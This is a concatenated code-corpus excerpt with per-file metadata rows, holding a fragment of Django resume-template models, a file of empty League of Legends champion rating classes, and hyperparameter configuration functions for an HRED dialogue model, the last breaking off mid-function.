    slug = models.SlugField(max_length=200, unique=True)
    # Rating constrained to 0..5 at form/model validation time (not at DB level).
    stars = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])
    # NOTE(review): max_length on a TextField is enforced only in forms, not
    # in the database — kept as-is to preserve the existing schema.
    description = models.TextField(max_length=255)
    addtowishlist = models.BooleanField(default=False)

    class Meta:
        abstract = True

    def __str__(self):
        return self.template_name


class Template(AbstractResumeTemplate):
    """Resume template; images land in resumetemplates/."""
    template_image = models.ImageField(upload_to='resumetemplates/')


class Cvtemplate(AbstractResumeTemplate):
    """CV template; images land in cvtemplates/."""
    template_image = models.ImageField(upload_to='cvtemplates/')


class Coverlettertemplate(AbstractResumeTemplate):
    """Cover-letter template; images land in coverlettertemplates/."""
    template_image = models.ImageField(upload_to='coverlettertemplates/')
| 42.714286
| 88
| 0.777035
| 217
| 1,794
| 6.21659
| 0.230415
| 0.080059
| 0.080059
| 0.062268
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0.854707
| 0
| 0.026532
| 0.117614
| 1,794
| 41
| 89
| 43.756098
| 0.825648
| 0.013378
| 0
| 0.75
| 0
| 0
| 0.027715
| 0.011878
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0.0625
| 0.09375
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1b07df45499e0d7ced26040874837514e382a551
| 6,269
|
py
|
Python
|
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_bard/na_bard_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Auto-generated placeholder models: one empty ``Ratings`` subclass per
# matchup champion for the NA / Bard / Mid ratings table. The class name
# (region_champion_lane_opponent) serves as the lookup key; the classes
# intentionally add no fields or behaviour of their own — everything is
# inherited from ``Ratings``.
class NA_Bard_Mid_Aatrox(Ratings):
    pass
class NA_Bard_Mid_Ahri(Ratings):
    pass
class NA_Bard_Mid_Akali(Ratings):
    pass
class NA_Bard_Mid_Alistar(Ratings):
    pass
class NA_Bard_Mid_Amumu(Ratings):
    pass
class NA_Bard_Mid_Anivia(Ratings):
    pass
class NA_Bard_Mid_Annie(Ratings):
    pass
class NA_Bard_Mid_Ashe(Ratings):
    pass
class NA_Bard_Mid_AurelionSol(Ratings):
    pass
class NA_Bard_Mid_Azir(Ratings):
    pass
class NA_Bard_Mid_Bard(Ratings):
    pass
class NA_Bard_Mid_Blitzcrank(Ratings):
    pass
class NA_Bard_Mid_Brand(Ratings):
    pass
class NA_Bard_Mid_Braum(Ratings):
    pass
class NA_Bard_Mid_Caitlyn(Ratings):
    pass
class NA_Bard_Mid_Camille(Ratings):
    pass
class NA_Bard_Mid_Cassiopeia(Ratings):
    pass
class NA_Bard_Mid_Chogath(Ratings):
    pass
class NA_Bard_Mid_Corki(Ratings):
    pass
class NA_Bard_Mid_Darius(Ratings):
    pass
class NA_Bard_Mid_Diana(Ratings):
    pass
class NA_Bard_Mid_Draven(Ratings):
    pass
class NA_Bard_Mid_DrMundo(Ratings):
    pass
class NA_Bard_Mid_Ekko(Ratings):
    pass
class NA_Bard_Mid_Elise(Ratings):
    pass
class NA_Bard_Mid_Evelynn(Ratings):
    pass
class NA_Bard_Mid_Ezreal(Ratings):
    pass
class NA_Bard_Mid_Fiddlesticks(Ratings):
    pass
class NA_Bard_Mid_Fiora(Ratings):
    pass
class NA_Bard_Mid_Fizz(Ratings):
    pass
class NA_Bard_Mid_Galio(Ratings):
    pass
class NA_Bard_Mid_Gangplank(Ratings):
    pass
class NA_Bard_Mid_Garen(Ratings):
    pass
class NA_Bard_Mid_Gnar(Ratings):
    pass
class NA_Bard_Mid_Gragas(Ratings):
    pass
class NA_Bard_Mid_Graves(Ratings):
    pass
class NA_Bard_Mid_Hecarim(Ratings):
    pass
class NA_Bard_Mid_Heimerdinger(Ratings):
    pass
class NA_Bard_Mid_Illaoi(Ratings):
    pass
class NA_Bard_Mid_Irelia(Ratings):
    pass
class NA_Bard_Mid_Ivern(Ratings):
    pass
class NA_Bard_Mid_Janna(Ratings):
    pass
class NA_Bard_Mid_JarvanIV(Ratings):
    pass
class NA_Bard_Mid_Jax(Ratings):
    pass
class NA_Bard_Mid_Jayce(Ratings):
    pass
class NA_Bard_Mid_Jhin(Ratings):
    pass
class NA_Bard_Mid_Jinx(Ratings):
    pass
class NA_Bard_Mid_Kalista(Ratings):
    pass
class NA_Bard_Mid_Karma(Ratings):
    pass
class NA_Bard_Mid_Karthus(Ratings):
    pass
class NA_Bard_Mid_Kassadin(Ratings):
    pass
class NA_Bard_Mid_Katarina(Ratings):
    pass
class NA_Bard_Mid_Kayle(Ratings):
    pass
class NA_Bard_Mid_Kayn(Ratings):
    pass
class NA_Bard_Mid_Kennen(Ratings):
    pass
class NA_Bard_Mid_Khazix(Ratings):
    pass
class NA_Bard_Mid_Kindred(Ratings):
    pass
class NA_Bard_Mid_Kled(Ratings):
    pass
class NA_Bard_Mid_KogMaw(Ratings):
    pass
class NA_Bard_Mid_Leblanc(Ratings):
    pass
class NA_Bard_Mid_LeeSin(Ratings):
    pass
class NA_Bard_Mid_Leona(Ratings):
    pass
class NA_Bard_Mid_Lissandra(Ratings):
    pass
class NA_Bard_Mid_Lucian(Ratings):
    pass
class NA_Bard_Mid_Lulu(Ratings):
    pass
class NA_Bard_Mid_Lux(Ratings):
    pass
class NA_Bard_Mid_Malphite(Ratings):
    pass
class NA_Bard_Mid_Malzahar(Ratings):
    pass
class NA_Bard_Mid_Maokai(Ratings):
    pass
class NA_Bard_Mid_MasterYi(Ratings):
    pass
class NA_Bard_Mid_MissFortune(Ratings):
    pass
class NA_Bard_Mid_MonkeyKing(Ratings):
    pass
class NA_Bard_Mid_Mordekaiser(Ratings):
    pass
class NA_Bard_Mid_Morgana(Ratings):
    pass
class NA_Bard_Mid_Nami(Ratings):
    pass
class NA_Bard_Mid_Nasus(Ratings):
    pass
class NA_Bard_Mid_Nautilus(Ratings):
    pass
class NA_Bard_Mid_Nidalee(Ratings):
    pass
class NA_Bard_Mid_Nocturne(Ratings):
    pass
class NA_Bard_Mid_Nunu(Ratings):
    pass
class NA_Bard_Mid_Olaf(Ratings):
    pass
class NA_Bard_Mid_Orianna(Ratings):
    pass
class NA_Bard_Mid_Ornn(Ratings):
    pass
class NA_Bard_Mid_Pantheon(Ratings):
    pass
class NA_Bard_Mid_Poppy(Ratings):
    pass
class NA_Bard_Mid_Quinn(Ratings):
    pass
class NA_Bard_Mid_Rakan(Ratings):
    pass
class NA_Bard_Mid_Rammus(Ratings):
    pass
class NA_Bard_Mid_RekSai(Ratings):
    pass
class NA_Bard_Mid_Renekton(Ratings):
    pass
class NA_Bard_Mid_Rengar(Ratings):
    pass
class NA_Bard_Mid_Riven(Ratings):
    pass
class NA_Bard_Mid_Rumble(Ratings):
    pass
class NA_Bard_Mid_Ryze(Ratings):
    pass
class NA_Bard_Mid_Sejuani(Ratings):
    pass
class NA_Bard_Mid_Shaco(Ratings):
    pass
class NA_Bard_Mid_Shen(Ratings):
    pass
class NA_Bard_Mid_Shyvana(Ratings):
    pass
class NA_Bard_Mid_Singed(Ratings):
    pass
class NA_Bard_Mid_Sion(Ratings):
    pass
class NA_Bard_Mid_Sivir(Ratings):
    pass
class NA_Bard_Mid_Skarner(Ratings):
    pass
class NA_Bard_Mid_Sona(Ratings):
    pass
class NA_Bard_Mid_Soraka(Ratings):
    pass
class NA_Bard_Mid_Swain(Ratings):
    pass
class NA_Bard_Mid_Syndra(Ratings):
    pass
class NA_Bard_Mid_TahmKench(Ratings):
    pass
class NA_Bard_Mid_Taliyah(Ratings):
    pass
class NA_Bard_Mid_Talon(Ratings):
    pass
class NA_Bard_Mid_Taric(Ratings):
    pass
class NA_Bard_Mid_Teemo(Ratings):
    pass
class NA_Bard_Mid_Thresh(Ratings):
    pass
class NA_Bard_Mid_Tristana(Ratings):
    pass
class NA_Bard_Mid_Trundle(Ratings):
    pass
class NA_Bard_Mid_Tryndamere(Ratings):
    pass
class NA_Bard_Mid_TwistedFate(Ratings):
    pass
class NA_Bard_Mid_Twitch(Ratings):
    pass
class NA_Bard_Mid_Udyr(Ratings):
    pass
class NA_Bard_Mid_Urgot(Ratings):
    pass
class NA_Bard_Mid_Varus(Ratings):
    pass
class NA_Bard_Mid_Vayne(Ratings):
    pass
class NA_Bard_Mid_Veigar(Ratings):
    pass
class NA_Bard_Mid_Velkoz(Ratings):
    pass
class NA_Bard_Mid_Vi(Ratings):
    pass
class NA_Bard_Mid_Viktor(Ratings):
    pass
class NA_Bard_Mid_Vladimir(Ratings):
    pass
class NA_Bard_Mid_Volibear(Ratings):
    pass
class NA_Bard_Mid_Warwick(Ratings):
    pass
class NA_Bard_Mid_Xayah(Ratings):
    pass
class NA_Bard_Mid_Xerath(Ratings):
    pass
class NA_Bard_Mid_XinZhao(Ratings):
    pass
class NA_Bard_Mid_Yasuo(Ratings):
    pass
class NA_Bard_Mid_Yorick(Ratings):
    pass
class NA_Bard_Mid_Zac(Ratings):
    pass
class NA_Bard_Mid_Zed(Ratings):
    pass
class NA_Bard_Mid_Ziggs(Ratings):
    pass
class NA_Bard_Mid_Zilean(Ratings):
    pass
class NA_Bard_Mid_Zyra(Ratings):
    pass
| 15.033573
| 46
| 0.75642
| 972
| 6,269
| 4.452675
| 0.151235
| 0.223198
| 0.350739
| 0.446396
| 0.791359
| 0.791359
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177221
| 6,269
| 416
| 47
| 15.069712
| 0.839085
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1b76567a713e75ae9afadb2be538c049b53017bd
| 102,340
|
py
|
Python
|
parlai/agents/hred/state.py
|
marcotcr/ParlAI
|
54c83b3de57ee4d7984d0f60a4cd09c9cda3f08e
|
[
"BSD-3-Clause"
] | 2
|
2017-10-06T09:56:49.000Z
|
2017-10-06T09:57:03.000Z
|
parlai/agents/hred/state.py
|
gmkim90/KBKAIST_Chatbot
|
4766e6ee61a10e3719b7608c5777430ddfd277f9
|
[
"BSD-3-Clause"
] | null | null | null |
parlai/agents/hred/state.py
|
gmkim90/KBKAIST_Chatbot
|
4766e6ee61a10e3719b7608c5777430ddfd277f9
|
[
"BSD-3-Clause"
] | 2
|
2017-10-06T09:57:04.000Z
|
2018-11-08T13:45:47.000Z
|
from collections import OrderedDict
import cPickle
import os
def prototype_state():
    """Return the default hyper-parameter dictionary for the HRED dialogue model.

    Every ``prototype_*`` configuration function below starts from this
    baseline and overrides a subset of keys.

    :return: mapping of option name -> default value
    :rtype: dict
    """
    state = {}

    # ----- CONSTANTS -----
    # Random seed
    state['seed'] = 1234
    # Logging level
    state['level'] = 'DEBUG'
    # Out-of-vocabulary token string
    state['oov'] = '<unk>'
    # These are end-of-sequence marks
    state['end_sym_utterance'] = '</s>'

    # Special tokens need to be defined here, because model architecture may adapt depending on these
    state['unk_sym'] = 0  # Unknown word token <unk>
    state['eos_sym'] = 1  # end-of-utterance symbol </s>
    state['eod_sym'] = 2  # end-of-dialogue symbol </d>
    state['first_speaker_sym'] = 3  # first speaker symbol <first_speaker>
    state['second_speaker_sym'] = 4  # second speaker symbol <second_speaker>
    state['third_speaker_sym'] = 5  # third speaker symbol <third_speaker>
    state['minor_speaker_sym'] = 6  # minor speaker symbol <minor_speaker>
    state['voice_over_sym'] = 7  # voice over symbol <voice_over>
    state['off_screen_sym'] = 8  # off screen symbol <off_screen>
    state['pause_sym'] = 9  # pause symbol <pause>

    # ----- MODEL ARCHITECTURE -----
    # If this flag is on, the hidden state between RNNs in subsequences is always initialized to zero.
    # Set this to reset all RNN hidden states between 'max_grad_steps' time steps
    state['reset_hidden_states_between_subsequences'] = False

    # If this flag is on, the maxout activation function will be applied to the utterance decoders output unit.
    # This requires qdim_decoder = 2x rankdim
    state['maxout_out'] = False

    # If this flag is on, a one-layer MLP with linear activation function will applied
    # on the utterance decoder hidden state before outputting the distribution over words.
    state['deep_utterance_decoder_out'] = True

    # If this flag is on, there will be an extra MLP between utterance and dialogue encoder
    state['deep_dialogue_encoder_input'] = False

    # Default and recommended setting is: tanh.
    # The utterance encoder and utterance decoder activation function
    state['sent_rec_activation'] = 'lambda x: T.tanh(x)'
    # The dialogue encoder activation function
    state['dialogue_rec_activation'] = 'lambda x: T.tanh(x)'

    # Determines how to input the utterance encoder and dialogue encoder into the utterance decoder RNN hidden state:
    #  - 'first': initializes first hidden state of decoder using encoders
    #  - 'all': initializes first hidden state of decoder using encoders,
    #           and inputs all hidden states of decoder using encoders
    #  - 'selective': as 'all', but with a gating function applied to the encoder input
    #                 to turn off certain dimensions if necessary.
    # Experiments show that 'all' is most effective.
    state['decoder_bias_type'] = 'all'

    # Define the gating function for the three RNNs.
    state['utterance_encoder_gating'] = 'GRU'  # Supports 'None' and 'GRU'
    state['dialogue_encoder_gating'] = 'GRU'  # Supports 'None' and 'GRU'
    state['utterance_decoder_gating'] = 'GRU'  # Supports 'None', 'BOW' (Bag of Words), 'GRU' and 'LSTM'

    # If this flag is on, two utterances encoders (one forward and one backward) will be used,
    # otherwise only a forward utterance encoder is used.
    state['bidirectional_utterance_encoder'] = False

    # If this flag is on, there will be a direct connection between utterance encoder and utterance decoder RNNs.
    state['direct_connection_between_encoders_and_decoder'] = False

    # If this flag is on, there will be an extra MLP between utterance encoder and utterance decoder.
    state['deep_direct_connection'] = False

    # If the 'direct_connection_between_encoders_and_decoder' is on, then enabling this flag will
    # change the model so that it does not use the dialogue encoder (context encoder)
    state['disable_dialogue_encoder'] = False

    # If this flag is on, the model will collaps to a standard RNN:
    # 1) The utterance+dialogue encoder input to the utterance decoder will be zero
    # 2) The utterance decoder will never be reset
    # Note this model will always be initialized with a hidden state equal to zero.
    state['collaps_to_standard_rnn'] = False

    # If this flag is on, the utterance decoder will be reset after each end-of-utterance token.
    state['reset_utterance_decoder_at_end_of_utterance'] = True

    # If this flag is on, the utterance encoder will be reset after each end-of-utterance token.
    state['reset_utterance_encoder_at_end_of_utterance'] = False

    # ----- HIDDEN LAYER DIMENSIONS -----
    # Dimensionality of (word-level) utterance encoder hidden state
    state['qdim_encoder'] = 512
    # Dimensionality of (word-level) utterance decoder (RNN which generates output) hidden state
    state['qdim_decoder'] = 512
    # Dimensionality of (utterance-level) context encoder hidden layer
    state['sdim'] = 1000
    # Dimensionality of low-rank word embedding approximation
    state['rankdim'] = 256

    # ----- LATENT VARIABLES WITH VARIATIONAL LEARNING -----
    # If this flag is on, a Gaussian latent variable is added at the beginning of each utterance.
    # The utterance decoder will be conditioned on this latent variable,
    # and the model will be trained using the variational lower bound.
    # See, for example, the variational auto-encoder by Kingma et al. (2013).
    state['add_latent_gaussian_per_utterance'] = False
    # This flag will condition the latent variables on the dialogue encoder
    state['condition_latent_variable_on_dialogue_encoder'] = False
    # This flag will condition the latent variable on the DCGM (mean pooling over words) encoder,
    # replacing the conditioning on the utterance encoder RNN.
    state['condition_posterior_latent_variable_on_dcgm_encoder'] = False
    # Dimensionality of Gaussian latent variable, which has diagonal covariance matrix.
    state['latent_gaussian_per_utterance_dim'] = 10

    # Constant by which the diagonal covariance matrix is scaled.
    # A high value (e.g. 1 or 10) keeps the KL divergence relatively low early in training.
    state['scale_latent_gaussian_variable_variances'] = 10
    state['min_latent_gaussian_variable_variances'] = 0.01
    state['max_latent_gaussian_variable_variances'] = 10.0

    # If on, apply a one-layer MLP to transform the input before computing the prior
    # and posterior of the Gaussian latent variable.
    state['deep_latent_gaussian_variable_conditioning'] = True

    # If this flag is on, the utterance decoder will ONLY be conditioned on the Gaussian latent variable.
    state['condition_decoder_only_on_latent_variable'] = False

    # If this flag is on, a piecewise latent variable is added at the beginning of each utterance.
    # The utterance decoder will be conditioned on this latent variable,
    # and the model will be trained using the variational lower bound.
    state['add_latent_piecewise_per_utterance'] = False
    # If this flag is on, the posterior piecewise distribution will be interpolated
    # with the prior distribution using a linear gating mechanism.
    state['gate_latent_piecewise_per_utterance'] = True

    state['latent_piecewise_alpha_variables'] = 5

    # Constant by which the prior piecewise alpha parameters are scaled.
    # Values in (2.0, 10) let the posterior adapt while leaving probability mass near 0.5.
    # With scale_latent_piecewise_variable_alpha=10, KL divergence cost is about 10% of overall cost initially.
    # With scale_latent_piecewise_variable_alpha=1, KL divergence cost is about 1% of overall cost initially.
    state['scale_latent_piecewise_variable_alpha_use_softplus'] = True
    state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
    state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
    state['latent_piecewise_per_utterance_dim'] = 10

    # If parameter tying is enabled, a Gaussian convolution is applied to all the alpha values,
    # making them dependent upon each other so a single sample updates nearby alpha weights.
    # Julian: This only helped slightly in my intial experiments.
    state['latent_piecewise_variable_alpha_parameter_tying'] = False
    state['latent_piecewise_variable_alpha_parameter_tying_beta'] = 1.0

    # If on, apply a one-layer MLP to transform the input before computing the prior
    # and posterior of the piecewise latent variable.
    state['deep_latent_piecewise_variable_conditioning'] = True

    # If this flag is on, the input to the utterance decoder will be passed through
    # a one-layer MLP with rectified linear units; with batch/layer normalization on,
    # this also ensures the decoder RNN inputs are normalized.
    state['deep_utterance_decoder_input'] = True

    # If this flag is on, the KL-divergence term weight for the latent variables
    # will be slowly increased from zero to one.
    state['train_latent_variables_with_kl_divergence_annealing'] = False
    # The KL-divergence term weight is increased by this amount every training batch
    # (truncated to one); e.g. 1.0/60000.0 reaches weight one at iteration 60000.
    state['kl_divergence_annealing_rate'] = 1.0/60000.0
    # The maximum KL-divergence term weight allowed. Only applies to models with annealed KL-divergence.
    state['kl_divergence_max_weight'] = 1.0

    # If enabled, previous token input to the decoder RNN is replaced with 'unk' tokens at random.
    state['decoder_drop_previous_input_tokens'] = False
    # Rate at which the previous tokens input to the decoder is kept (not set to 'unk').
    # Zero effectively disables teacher-forcing in the model.
    state['decoder_drop_previous_input_tokens_rate'] = 0.75

    # If enabled, mean field inference with stochastic gradient descent is applied at test time.
    # Julian: This didn't really make a big difference...
    state['apply_meanfield_inference'] = False

    # Word embedding initialization
    state['initialize_from_pretrained_word_embeddings'] = False
    state['pretrained_word_embeddings_file'] = ''
    state['fix_pretrained_word_embeddings'] = False

    # If this flag is on, fix the parameters of the utterance encoder and dialogue encoder RNNs,
    # as well as the word embeddings. NOTE: NOT APPLICABLE when 'collaps_to_standard_rnn' is on.
    state['fix_encoder_parameters'] = False

    # If disabled, the model will not generate the first utterance in a dialogue
    # (used for the debate dataset as well as the skip_utterance configuration).
    state['do_generate_first_utterance'] = True

    # If enabled, the data iterator conditions on exactly one utterance and predicts one
    # (the next or the previous); forces 'do_generate_first_utterance' off.
    state['skip_utterance'] = False
    # With 'skip_utterance' on, predict both the previous and next utterances.
    # Note, this will double the batch size!
    state['skip_utterance_predict_both'] = False

    # ----- TRAINING PROCEDURE -----
    # Choose optimization algorithm (adam works well most of the time)
    state['updater'] = 'adam'
    # If on, NCE (Noise-Contrastive Estimation) is used to train the model — faster for
    # large vocabularies (e.g. more than 20K words), but experiments show degraded performance.
    state['use_nce'] = False
    # Threshold to clip the gradient
    state['cutoff'] = 0.01
    # Learning rate. 0.0002 works well across many tasks with adam;
    # it can be lowered (e.g. 0.00004) at the end of training to help convergence.
    state['lr'] = 0.0002
    # Early stopping configuration
    state['patience'] = 20
    state['cost_threshold'] = 1.003
    # Batch size. If out of memory, modify this!
    state['bs'] = 80
    # Sort by length groups of
    state['sort_k_batches'] = 20

    # Training examples are split into subsequences of at most this size; gradients are
    # computed per subsequence and the last hidden states seed the next subsequence.
    state['max_grad_steps'] = 80

    # Modify this in the prototype
    state['save_dir'] = './'
    # Frequency of training error reports (in number of batches)
    state['train_freq'] = 10
    # Validation frequency
    state['valid_freq'] = 5000
    # Number of batches to process
    state['loop_iters'] = 3000000
    # Maximum number of minutes to run
    state['time_stop'] = 24*60*31
    # Error level to stop at
    state['minerr'] = -1
    # Maximum dialogue length
    state['max_len'] = -1

    # Normalization applied to encoder hidden states: 'NONE', 'BN' (batch norm) or 'LN' (layer norm).
    # Note: only applicable to GRU encoders and feed-forward neural networks.
    state['normop_type'] = 'LN'

    # Shared normalization constants (identical for BN and LN; hoisted out of the branch).
    state['normop_gamma_min'] = 0.05
    state['normop_gamma_max'] = 10.0
    state['normop_moving_average_const'] = 0.99
    if state['normop_type'] == 'BN':
        state['normop_gamma_init'] = 0.1
        state['normop_max_enc_seq'] = 50
    else:
        state['normop_gamma_init'] = 1.0
        state['normop_max_enc_seq'] = 1

    # Training data iterator initialization: first offset position in the list of examples,
    # and the number of reshuffles to perform at the beginning.
    state['train_iterator_offset'] = 0
    state['train_iterator_reshuffle_count'] = 1

    return state
def prototype_test():
    """Tiny configuration used by the unit tests (small dims, local test data)."""
    config = prototype_state()

    # Fill paths here!
    config.update({
        'train_dialogues': "./tests/data/ttrain.dialogues.pkl",
        'test_dialogues': "./tests/data/ttest.dialogues.pkl",
        'valid_dialogues': "./tests/data/tvalid.dialogues.pkl",
        'dictionary': "./tests/data/ttrain.dict.pkl",
        'save_dir': "./tests/models/",
        'max_grad_steps': 20,
        # Handle pretrained word embeddings. Using this requires rankdim=10
        'initialize_from_pretrained_word_embeddings': False,
        'pretrained_word_embeddings_file': './tests/data/MT_WordEmb.pkl',
        'fix_pretrained_word_embeddings': False,
        'valid_freq': 50,
        'prefix': "testmodel_",
        'updater': 'adam',
        'maxout_out': False,
        'deep_utterance_decoder_out': True,
        'deep_dialogue_encoder_input': True,
        'utterance_encoder_gating': 'GRU',
        'dialogue_encoder_gating': 'GRU',
        'utterance_decoder_gating': 'GRU',
        'bidirectional_utterance_encoder': True,
        'direct_connection_between_encoders_and_decoder': True,
        'bs': 5,
        'sort_k_batches': 1,
        'use_nce': False,
        'decoder_bias_type': 'all',
        'qdim_encoder': 15,
        'qdim_decoder': 5,
        'sdim': 10,
        'rankdim': 10,
    })
    return config
def prototype_test_variational():
    """Tiny configuration for unit-testing the variational (latent-variable) model.

    Fix applied: ``train_latent_variables_with_kl_divergence_annealing`` was
    assigned ``True`` twice in the original; the redundant second assignment
    is removed (the effective value is unchanged).
    """
    state = prototype_state()

    # Fill paths here!
    state['train_dialogues'] = "./tests/data/ttrain.dialogues.pkl"
    state['test_dialogues'] = "./tests/data/ttest.dialogues.pkl"
    state['valid_dialogues'] = "./tests/data/tvalid.dialogues.pkl"
    state['dictionary'] = "./tests/data/ttrain.dict.pkl"
    state['save_dir'] = "./tests/models/"

    state['max_grad_steps'] = 20

    # Handle pretrained word embeddings. Using this requires rankdim=10
    state['initialize_from_pretrained_word_embeddings'] = True
    state['pretrained_word_embeddings_file'] = './tests/data/MT_WordEmb.pkl'

    state['valid_freq'] = 5

    state['prefix'] = "testmodel_"
    state['updater'] = 'adam'

    state['maxout_out'] = False
    state['deep_utterance_decoder_out'] = True
    state['deep_dialogue_encoder_input'] = True
    state['direct_connection_between_encoders_and_decoder'] = False
    state['deep_direct_connection'] = False

    state['utterance_encoder_gating'] = 'GRU'
    state['dialogue_encoder_gating'] = 'GRU'
    state['utterance_decoder_gating'] = 'LSTM'
    state['bidirectional_utterance_encoder'] = False

    # Gaussian latent variable (disabled here; dims kept small for testing).
    state['add_latent_gaussian_per_utterance'] = False
    state['latent_gaussian_per_utterance_dim'] = 5
    state['condition_latent_variable_on_dialogue_encoder'] = True
    state['condition_posterior_latent_variable_on_dcgm_encoder'] = False

    # Anneal the KL-divergence weight from zero up to kl_divergence_max_weight.
    state['train_latent_variables_with_kl_divergence_annealing'] = True
    state['kl_divergence_annealing_rate'] = 1.0/60000.0
    state['kl_divergence_max_weight'] = 0.5

    # Piecewise latent variable (enabled, ungated).
    state['add_latent_piecewise_per_utterance'] = True
    state['latent_piecewise_per_utterance_dim'] = 10
    state['gate_latent_piecewise_per_utterance'] = False

    state['decoder_drop_previous_input_tokens'] = True
    state['decoder_drop_previous_input_tokens_rate'] = 0.75

    state['bs'] = 5
    state['sort_k_batches'] = 1
    state['use_nce'] = False
    state['decoder_bias_type'] = 'all'

    state['qdim_encoder'] = 15
    state['qdim_decoder'] = 5
    state['sdim'] = 10
    state['rankdim'] = 10

    # NOTE: an alternative to annealing is the KL max-trick:
    #   train_latent_variables_with_kl_divergence_annealing = False,
    #   max_kl_percentage = 0.01
    return state
###
### Twitter - Hyperparameter search for HRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_HRED_NormOp_ClusterExp1():
    """Twitter HRED hyper-parameter search, point 1: qdim 1000/1000, sdim 500, LN."""
    config = prototype_state()

    # Fill your paths here!
    config.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'bs': 80,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 500,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent variables disabled in this experiment.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': False,
        'train_latent_variables_with_kl_divergence_annealing': False,
        'kl_divergence_annealing_rate': 1.0/60000.0,
        'decoder_drop_previous_input_tokens': False,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return config
def prototype_twitter_HRED_NormOp_ClusterExp2():
    """Twitter HRED hyper-parameter search, point 2: qdim 1000/1000, sdim 1000, LN."""
    config = prototype_state()

    # Fill your paths here!
    config.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'bs': 80,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent variables disabled in this experiment.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': False,
        'train_latent_variables_with_kl_divergence_annealing': False,
        'kl_divergence_annealing_rate': 1.0/60000.0,
        'decoder_drop_previous_input_tokens': False,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return config
def prototype_twitter_HRED_NormOp_ClusterExp3():
    """Twitter HRED cluster hyperparameter-search config (experiment 3).

    LSTM decoder, qdim_encoder=1000, qdim_decoder=2000, sdim=1000;
    all latent-variable options disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
